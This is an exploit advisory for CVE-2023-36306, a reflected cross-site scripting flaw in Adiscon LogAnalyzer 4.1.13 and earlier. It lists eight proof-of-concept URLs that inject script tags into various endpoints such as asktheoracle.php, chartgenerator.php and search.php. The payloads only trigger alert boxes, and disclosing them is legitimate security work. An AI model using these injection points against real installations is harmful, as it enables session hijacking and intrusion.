# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting # Date: 2023.Aug.01 # Exploit Author: Pedro (ISSDU TW) # Vendor Homepage: https://loganalyzer.adiscon.com/ # Software Link: https://loganalyzer.adiscon.com/download/ # Version: v4.1.13 and before # Tested on: Linux # CVE : CVE-2023-36306 There are several installation method. If you installed without database(File-Based),No need to login. If you installed with database, You should login with Read Only User(at least) XSS Payloads are as below: XSS http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123 http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E